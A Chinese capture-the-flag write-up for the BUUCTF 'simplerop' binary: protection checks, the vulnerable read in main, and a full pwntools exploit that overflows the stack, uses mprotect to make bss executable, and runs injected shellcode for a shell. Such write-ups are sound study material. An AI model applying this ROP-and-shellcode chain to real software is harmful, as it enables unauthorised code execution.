cmcc simplerop
# cmcc simplerop
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/cmcc_simplerop/simplerop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [esp+1Ch] [ebp-14h]
puts("ROP is easy is'nt it ?");
printf("Your input :");
fflush(stdout);
return read(0, &v4, 100);
}
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
# 链接方式
file simplerop
simplerop: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=bdd40d725b490b97d5a25857a6273870c7de399f, not stripped
1
2
2
静态链接
# 思路分析
目前信息:
main函数存在任意长度的溢出点- 静态链接文件
- No canary found
- NX enabled
- No PIE
思路:
- 溢出劫持执行流到
mprotect修改bss段的权限,将shellcode写入bss段处,返回并执行获得shell
- 溢出劫持执行流到
# exp
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/cmcc_simplerop/simplerop'
io = remote("node4.buuoj.cn", 29263)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 0x1c+4
mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']
bss_start = elf.bss() & 0xfffff000 # 页对齐
bss_size = 0x1000
rwx = 7
pop_3times_ret = 0x0806e828
payload = flat(['a'*padding, mprotect_addr, pop_3times_ret, bss_start,bss_size, rwx, read_addr, bss_start, 0, bss_start, bss_size])
io.recvuntil('Your input :')
io.sendline(payload)
shellcode = asm(shellcraft.sh())
io.send(shellcode)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
上次更新: 2022/08/15, 00:29:49